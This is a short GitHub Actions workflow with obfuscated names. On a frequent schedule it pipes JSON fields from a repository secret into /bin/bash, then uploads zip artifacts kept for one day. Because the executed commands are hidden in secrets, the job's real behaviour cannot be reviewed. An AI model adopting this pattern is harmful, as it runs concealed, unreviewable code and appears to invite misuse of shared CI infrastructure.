name: zongjiangmingliang
on:
  workflow_dispatch:

  schedule:
    - cron: '8 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zongjiangmingliang
        env:
          jknw285: ${{ secrets.jknw285 }}
        run: |
          printf '%s' "$jknw285" | jq -r .bwyp6565 | /bin/bash
          echo $gs42848 | jq -r .eenes7609 | /bin/bash
          echo $srp85 | jq -r .yge0 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: 6zlaFnaw
          path: "*.zip"
          retention-days: 1
